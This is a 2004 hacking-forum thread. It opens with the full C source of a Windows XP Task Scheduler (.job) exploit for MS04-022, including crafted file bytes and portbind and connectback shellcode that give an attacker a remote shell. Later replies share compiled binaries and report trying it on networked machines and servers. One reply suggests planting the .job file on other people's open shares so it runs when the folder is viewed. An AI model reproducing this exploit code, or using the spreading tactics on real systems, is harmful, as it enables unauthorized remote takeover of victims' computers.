Forums: Microsoft Windows Xp Task Scheduler (.job) Univers - Forums

Jump to content

  • (2 Pages)
  • +
  • 1
  • 2
  • You cannot start a new topic
  • You cannot reply to this topic

Microsoft Windows Xp Task Scheduler (.job) Univers

#1 Guest_tte_*

  • Group: Guests

Posted 31 July 2004 - 04:05 AM

Microsoft Windows XP Task Scheduler (.job) Universal Exploit (MS04-022) 


/* HOD-ms04022-task-expl.c:
 *
 * (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit
 *
 * Exploit version 0.1 coded by
 *
 *
 *                 .::[ houseofdabus ]::.
 *
 *
 * [at inbox dot ru]
 * -------------------------------------------------------------------
 * Tested on:
 *    - Internet Explorer 6.0 (SP1) (iexplore.exe)
 *    - Explorer (explorer.exe)
 *    - Windows XP SP0, SP1
 *
 * -------------------------------------------------------------------
 * Compile:
 *    Win32/VC++  : cl HOD-ms04022-task-expl.c
 *    Win32/cygwin: gcc HOD-ms04022-task-expl.c -lws2_32.lib
 *    Linux       : gcc -o HOD-ms04022-task-expl HOD-ms04022-task-expl.c
 *
 * -------------------------------------------------------------------
 * Command Line Parameters/Arguments:
 *
 *   HOD.exe <file> <shellcode> <bind/connectback port> [connectback IP]
 *
 *   Shellcode:
 *        1 - Portbind shellcode
 *        2 - Connectback shellcode
 *
 * -------------------------------------------------------------------
 * Example:
 *
 * C:\>HOD-ms04022-task-expl.exe expl.job 1 7777
 *
 * (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit
 *
 * --- Coded by .::[ houseofdabus ]::. ---
 *
 * [*] Shellcode: Portbind, port = 7777
 * [*] Generate file: expl.job
 *
 * C:\>
 *
 * start IE -> C:\
 *
 * C:\>telnet localhost 7777
 * Microsoft Windows XP [‚¥אב¨ן 5.1.2600]
 * (‘) Š®א¯®א ז¨ן Œ ©×א®ב®הג, 1985-2001.
 *
 * C:\Documents and Settings\v.X\? ¡®ח¨© בג®«>
 *
 * -------------------------------------------------------------------
 *
 *   This is provided as proof-of-concept code only for educational
 *   purposes and testing by authorized individuals with permission to
 *   do so.
 *
 */

/* #define _WIN32 */

#include <stdio.h>
#include <stdlib.h>

#ifdef _WIN32
#pragma comment(lib,"ws2_32")
#include <winsock2.h>

#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#endif



unsigned char jobfile[] = 

/* job header */
"\x01\x05\x01\x00\xD9\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\x46\x00\x92\x00\x00\x00\x00\x00\x3C\x00\x0A\x00"
"\x20\x00\x00\x00\x00\x14\x73\x0F\x00\x00\x00\x00\x03\x13\x04\x00"
"\xC0\x00\x80\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00"

/* length */
"\x11\x11"

/* garbage C:\... */
/* unicode */
"\x43\x00\x3A\x00\x5C\x00\x61\x00"
"\x2E\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"
"\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"

"\x1E\x82\xDC\x77"

/* 0x77dc821e - pop reg, pop reg, ret (advapi32.dll) */
/* for Win2k use jmp ebx or call ebx  */

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x80\x31\x31\x80" /* generate exception */

"\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"
"\x90\x90";



/* portbind shellcode */
unsigned char portbindsc[] = 
"\x90\x90"
"\x90\x90\xEB\x06" /* overwrite SEH-frame */
"\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"

"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
"\x61\xc3\xeb\x3d\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xa4\x1a\x70"
"\xc7\xa4\xad\x2e\xe9\xe5\x49\x86\x49\xcb\xed\xfc\x3b\xe7\x79\xc6"
"\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5e"
"\xe8\x3d\xff\xff\xff\x8b\xd0\x83\xee\x36\x8d\x7d\x04\x8b\xce\x83"
"\xc1\x10\xe8\x9d\xff\xff\xff\x83\xc1\x18\x33\xc0\x66\xb8\x33\x32"
"\x50\x68\x77\x73\x32\x5f\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59"
"\x8b\xd0\xe8\x7d\xff\xff\xff\xb8\x01\x63\x6d\x64\xc1\xf8\x08\x50"
"\x89\x65\x34\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0\x72\x50"
"\xff\x55\x24\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14"
"\x8b\xf0\x33\xc0\x33\xdb\x50\x50\x50\xb8\x02\x01\x11\x5c\xfe\xcc"
"\x50\x8b\xc4\xb3\x10\x53\x50\x56\xff\x55\x18\x53\x56\xff\x55\x1c"
"\x53\x8b\xd4\x2b\xe3\x8b\xcc\x52\x51\x56\xff\x55\x20\x8b\xf0\x33"
"\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6\x07\x44"
"\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d"
"\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x34\x50"
"\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55"
"\x28\xff\x55\x0c";



/* connectback shellcode */
unsigned char connectbacksc[] = 
"\x90\x90"
"\x90\x90\xEB\x06" /* overwrite SEH-frame */
"\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"

"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
"\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa"
"\x60\xcb\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02"
"\xeb\x05\xe8\xf9\xff\xff\xff\x5e\xe8\x45\xff\xff\xff\x8b\xd0\x83"
"\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10\xe8\xa5\xff\xff\xff\x83"
"\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f\x8b\xdc"
"\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8"
"\x01\x63\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90"
"\x01\x2b\xe0\x54\x83\xc0\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50"
"\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0\x68\x7f\x01\x01\x01\xb8"
"\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50\x53\x56"
"\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa"
"\x5f\xc6\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab"
"\x5f\x33\xc0\x8d\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50"
"\xff\x75\x30\x50\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff"
"\x77\x38\xff\x55\x20\xff\x55\x0c";



/* use this form
unsigned char sc[] = 
"\x90\x90"
"\x90\x90\xEB\x06" - overwrite SEH-frame
"\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"

"... code ...";
*/

unsigned char endofjob[] = "\x00\x00\x00\x00";

#define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+300+16)) = (port)
#define SET_CONNECTBACK_IP(buf, ip)     *(unsigned long *)(((buf)+283+16)) = (ip)
#define SET_CONNECTBACK_PORT(buf, port) *(unsigned short *)(((buf)+290+16)) = (port)

void
usage(char *prog)
{
	printf("Usage:\n");
	printf("%s <file> <shellcode> <bind/connectback port> [connectback IP]\n", prog);
	printf("\nShellcode:\n");
	printf("      1 - Portbind shellcode\n");
	printf("      2 - Connectback shellcode\n\n");
	exit(0);
}

int
main(int argc, char **argv)
{
	unsigned short strlen;
	unsigned short port;
	unsigned long ip, sc;
	FILE *fp, *fp2;

	printf("\n(MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit\n\n");
	printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");

	if (argc < 4) usage(argv[0]);

	sc = atoi(argv[2]);
	if ( ((sc == 2) && (argc < 5)) || (sc > 2)) usage(argv[0]);

	fp = fopen(argv[1], "wb");
	if (fp == NULL) {
  printf("[-] error: can\'t create file: %s\n", argv[1]);
  exit(0);
	}

	/* header & garbage */
	fwrite(jobfile, 1, sizeof(jobfile)-1, fp);
	fseek(fp, 39*16, SEEK_SET);

	port = atoi(argv[3]);
	printf("[*] Shellcode: ");
	if (sc == 1) {
  SET_PORTBIND_PORT(portbindsc, htons(port));
  printf("Portbind, port = %u\n", port);
  fwrite(portbindsc, 1, sizeof(portbindsc)-1, fp);
  fwrite(endofjob, 1, 4, fp);
  fseek(fp, 70, SEEK_SET);
  /* calculate length (see header) */
  strlen = (sizeof(jobfile)-1-71+sizeof(portbindsc)-1+4)/2;
	}
	else {
  ip = inet_addr(argv[4]);
  SET_CONNECTBACK_IP(connectbacksc, ip);
  SET_CONNECTBACK_PORT(connectbacksc, htons(port));
  printf("Connectback, port = %u, IP = %s\n", port, argv[4]);
  fwrite(connectbacksc, 1, sizeof(connectbacksc)-1, fp);
  fwrite(endofjob, 1, 4, fp);
  fseek(fp, 70, SEEK_SET);
  /* calculate length (see header) */
  strlen = (sizeof(jobfile)-1-71+sizeof(connectbacksc)-1+4)/2;
	}

	printf("[*] Generate file: %s\n", argv[1]);
	fwrite(&strlen, 1, 2, fp);
	fclose(fp);

return 0;
}

0

#2 User is offline   Serhat 

  • Second Lieutenant
  • Icon
  • Group: Members
  • Posts: 803
  • Joined: 13-January 04

Posted 31 July 2004 - 01:53 PM

I don't see the file?
Well I'll include it to this post then
I just got it compiled.. ;x

Get Cygwin1.dll iif you don't have it.. ;x it needs it

Serhat

Attached File(s)


0

#3 User is offline   MaNiAx 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 45
  • Joined: 06-July 03

Posted 31 July 2004 - 02:02 PM

very nicely done it's a little buggy for now worked on 5/7 machines i tested it on the network.

-MaNiAx
0

#4 User is offline   ivan288 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 115
  • Joined: 17-October 03

Posted 01 August 2004 - 12:14 AM

local exploit right??
0

#5 User is offline   xoro 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 25
  • Joined: 22-September 03

Posted 01 August 2004 - 01:04 AM

yes
0

#6 User is offline   Serhat 

  • Second Lieutenant
  • Icon
  • Group: Members
  • Posts: 803
  • Joined: 13-January 04

Posted 01 August 2004 - 04:03 AM

local? you can also send the job file to someone else that will automaticly run it and bind a shell to the specified port.. so which means remote and local.. the other one.. the notepad.exe executing one is local.. ;)
Why shouldn't you need a local bindport ?

Serhat
0

#7 User is offline   BuzzDee 

  • Master Sergeant
  • Icon
  • Group: Specialist
  • Posts: 454
  • Joined: 27-September 03

Posted 01 August 2004 - 04:55 AM

hmm didnt work for me, yet. tried 6 servers without shell...
0

#8 User is offline   Serhat 

  • Second Lieutenant
  • Icon
  • Group: Members
  • Posts: 803
  • Joined: 13-January 04

Posted 01 August 2004 - 07:46 AM

I heard about someone getting 3/4 shells with it.. though the computer needs to meet some requirments... like running the Task Sheduler service ( which I don't! :P ) etc..
also I can't confirm whether it works 100% also.. cause I didn't tested it yet.. just compiled the source code for you guys =)

Serhat
0

#9 User is offline   detonator 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 76
  • Joined: 29-August 03

Posted 01 August 2004 - 11:03 AM

Serhat, on Aug 1 2004, 12:03 PM, said:

local? you can also send the job file to someone else that will automaticly run it and bind a shell to the specified port.. so which means remote and local.. the other one.. the notepad.exe executing one is local.. ;)
Why shouldn't you need a local bindport ?

Serhat

:blink: :blink: :blink:
and how should i send this jobfile to a machine :blink: :blink:
with this exploit i need a box . if i sit in front of the the box or i have a remote shell is not important <_<
greetz
0

#10 User is offline   Serhat 

  • Second Lieutenant
  • Icon
  • Group: Members
  • Posts: 803
  • Joined: 13-January 04

Posted 01 August 2004 - 01:04 PM

just use the way you like.. for example you can send it to somebody's shares if he has enabled it.. meaning it will bind a port when the directory is beeing viewed.. dunno sure if beeing viewed via the shares executes it aswell..

Serhat
0

#11 Guest_[Z]castor_*

  • Group: Guests

Posted 02 August 2004 - 08:20 AM

gonna try to use it thanx sharing :)
0

#12 User is offline   nuorder 

  • Master Sergeant
  • Icon
  • Group: Members
  • Posts: 574
  • Joined: 01-April 04

Posted 02 August 2004 - 06:25 PM

and for those who want the standalone exe without the need for cygwin.dll

Attached File(s)


0

#13 User is offline   r3L4x 

  • Corporal
  • Icon
  • Group: Members
  • Posts: 168
  • Joined: 13-August 03

Posted 02 August 2004 - 06:52 PM

that has to be some of the sloppiest code i have ever seen!
0

#14 User is offline   mortello 

  • Master Sergeant
  • Icon
  • Group: Members
  • Posts: 408
  • Joined: 25-August 03

Posted 02 August 2004 - 07:12 PM

r3L4x, on Aug 3 2004, 02:52 AM, said:

that has to be some of the sloppiest code i have ever seen!

that's because you didn't see mine :P
0

#15 User is offline   Chris 

  • Specialist
  • Icon
  • Group: Specialist
  • Posts: 1,202
  • Joined: 31-August 03

Posted 03 August 2004 - 01:37 AM

Hang on a minute ..... When you open the folder to find the .job file to send to someone are you not infecting yourself ? :blink:
0
  • (2 Pages)
  • +
  • 1
  • 2
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users

  • Share



Our Sponsors:


SwiftLayer Affiliate Web Hosting